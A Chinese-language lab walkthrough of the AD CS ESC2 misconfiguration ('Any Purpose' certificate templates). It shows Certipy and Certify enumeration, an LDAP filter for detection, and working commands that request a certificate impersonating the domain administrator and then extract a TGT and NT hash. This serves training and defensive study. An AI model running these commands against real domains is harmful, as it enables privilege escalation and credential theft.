ESC2
1. 什么是ESC2
当证书模板指定了 “任意用途(Any Purpose)” 扩展密钥用法(EKU),或者未指定任何扩展密钥用法时,该证书就可以被用于任何目的(如客户端身份验证、服务器身份验证、代码签名等)。
- 场景一(类似 ESC1): 如果该模板允许在证书签名请求(CSR)中指定使用者备用名称(SAN),那么易受 ESC2 漏洞影响的模板可以像ESC1一样被直接利用(即伪造任意用户身份进行登录)。
- 场景二: 在另一种情况下,如果请求者无法直接指定 SAN,该证书仍可以作为一种“先决条件”,用来代表任何其他用户去请求另一个新证书(即作为注册代理证书使用)。
2. 利用
2.1. 要求
- CA向低权限用户授予注册权限
- 关闭管理员审批
- 无需授权签名
- 证书模板的SID过于宽松、允许低权限用户注册此证书模板
- 证书模板应定义“
Any Purpose”或不指定Extended Key Usage
2.2. On Linux
2.2.1. 枚举
┌──(root㉿kali)-[~/Desktop/Academy/ADCS]
└─# certipy find -u 'blwasp@lab.local' -p 'Password123!' -dc-ip 10.129.22.58 -vulnerable -stdout
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 41 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 18 enabled certificate templates
[*] Finding issuance policies
[*] Found 29 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'lab-LAB-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'lab-LAB-DC-CA'
[*] Checking web enrollment for CA 'lab-LAB-DC-CA' @ 'LAB-DC.lab.local'
[!] Error checking web enrollment: [Errno 104] Connection reset by peer
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Template Name : ESC2
Display Name : ESC2
Certificate Authorities : lab-LAB-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : True
Any Purpose : True Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : IncludeSymmetricAlgorithms
PublishToDs
Private Key Flag : ExportableKey
Extended Key Usage : Any Purpose Requires Manager Approval : False Requires Key Archival : False
Authorized Signatures Required : 0 Schema Version : 2
Validity Period : 99 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Template Created : 2023-05-01T16:59:28+00:00
Template Last Modified : 2023-07-05T11:47:20+00:00
Permissions
Enrollment Permissions
Enrollment Rights : LAB.LOCAL\Domain Admins
LAB.LOCAL\Domain Users
LAB.LOCAL\Enterprise Admins
Object Control Permissions
Owner : LAB.LOCAL\Administrator
Full Control Principals : LAB.LOCAL\Domain Admins
LAB.LOCAL\Enterprise Admins
Write Owner Principals : LAB.LOCAL\Domain Admins
LAB.LOCAL\Enterprise Admins
Write Dacl Principals : LAB.LOCAL\Domain Admins
LAB.LOCAL\Enterprise Admins
Write Property Enroll : LAB.LOCAL\Domain Admins
LAB.LOCAL\Domain Users
LAB.LOCAL\Enterprise Admins
[+] User Enrollable Principals : LAB.LOCAL\Domain Users
[!] Vulnerabilities
ESC1 : Enrollee supplies subject and template allows client authentication. ESC2 : Template can be used for any purpose.
可以看出ESC2模板的特点:
- 基本的条件(无管理员审批、不要求认证签名)
- Any Purpose:True 或者 Extended Key Usage : Any Purpose
- 且此模板还允许指定
SAN,说明此模板还容易受到ESC1的攻击
2.2.2. 利用
https://github.com/ly4k/Certipy/wiki/06-%E2%80%90-Privilege-Escalation#esc2-any-purpose-certificate-template
由于这里的ESC2模板允许在CSR中添加备用用户,所以可以和ESC1漏洞利用的相同攻击方式来滥用ESC2模板
┌──(root㉿kali)-[~/Desktop/Academy/ADCS]
└─# certipy req -u 'BlWasp@lab.local' -p 'Password123!' -dc-ip 10.129.22.58 -ca lab-LAB-DC-CA -target LAB-DC.lab.local -template ESC2 -upn 'administrator@lab.local'
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 70
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@lab.local'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
┌──(root㉿kali)-[~/Desktop/Academy/ADCS]
└─# certipy auth -pfx administrator.pfx -dc-ip 10.129.22.58
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@lab.local'
[*] Using principal: 'administrator@lab.local'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@lab.local': aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe
2.3. On Windows
2.3.1. 枚举
C:\Users\blwasp\Desktop>.\Certify.exe enum-templates --filter-enabled --filter-vulnerable
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v2.0.0
[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=lab,DC=local'
[*] Classifying vulnerabilities in the context of built-in low-privileged domain groups.
Template Name : ESC2
Enabled : True
Publishing CAs : LAB-DC.lab.local\lab-LAB-DC-CA
Schema Version : 2
Validity Period : 99 years
Renewal Period : 6 weeks
Certificate Name Flag : ENROLLEE_SUPPLIES_SUBJECT
Enrollment Flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Manager Approval Required : FalseAuthorized Signatures Required : 0Extended Key Usage : Any PurposeCertificate Application Policies : Any Purpose
Vulnerabilities
ESC1 : The template has a client authentication EKU and allows enrollees to supply subject.
Permissions
Enrollment Permissions
Enrollment Rights : LAB\Domain Admins S-1-5-21-2570265163-3918697770-3667495639-512
LAB\Domain Users S-1-5-21-2570265163-3918697770-3667495639-513
LAB\Enterprise Admins S-1-5-21-2570265163-3918697770-3667495639-519
Object Control Permissions
Owner : LAB\Administrator S-1-5-21-2570265163-3918697770-3667495639-500
Write Owner : LAB\Administrator S-1-5-21-2570265163-3918697770-3667495639-500
LAB\Domain Admins S-1-5-21-2570265163-3918697770-3667495639-512
LAB\Enterprise Admins S-1-5-21-2570265163-3918697770-3667495639-519
Write Dacl : LAB\Administrator S-1-5-21-2570265163-3918697770-3667495639-500
LAB\Domain Admins S-1-5-21-2570265163-3918697770-3667495639-512
LAB\Enterprise Admins S-1-5-21-2570265163-3918697770-3667495639-519
Write Property : LAB\Administrator S-1-5-21-2570265163-3918697770-3667495639-500
LAB\Domain Admins S-1-5-21-2570265163-3918697770-3667495639-512
LAB\Enterprise Admins S-1-5-21-2570265163-3918697770-3667495639-519
或者使用powershell枚举
PS C:\Tools> Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=2.5.29.37.0)(!(pkiextendedkeyusage=*))))' -SearchBase 'CN=Configuration,DC=lab,DC=local'
DistinguishedName Name ObjectClass ObjectGUID
----------------- ---- ----------- ----------
CN=CA,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=lab,DC=local CA pKICertificateTemplate bf1d9716-8772-4388-b043-1df4a7550492
CN=SubCA,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=lab,DC=local SubCA pKICertificateTemplate 07cbebe1-00fb-4e23-9d6e-15644c9a95e0
CN=ESC2,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=lab,DC=local ESC2 pKICertificateTemplate f09870a6-cdcc-4951-bcd0-fa875a1248aa
2.3.2. 利用
这里利用的方式与ESC1相同
C:\Users\blwasp\Desktop>Certify.exe request --ca LAB-DC.lab.local\lab-LAB-DC-CA --template ESC2 --upn administrator@lab.local
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v2.0.0
[*] Action: Request a certificate
[*] Current user context : LAB\blwasp
[*] No subject name specified, using current context as subject.
[*] Template : ESC2
[*] Subject : CN=Black Wasp, CN=Users, DC=lab, DC=local
[*] Subject Alt Name(s) : administrator@lab.local
[*] Certificate Authority : LAB-DC.lab.local\lab-LAB-DC-CA
[*] CA Response : The certificate has been issued.
[*] Request ID : 71
[*] Certificate (PFX) :
MIACAQMwgAYJKoZIhvcNAQcBoIAkgASCA+............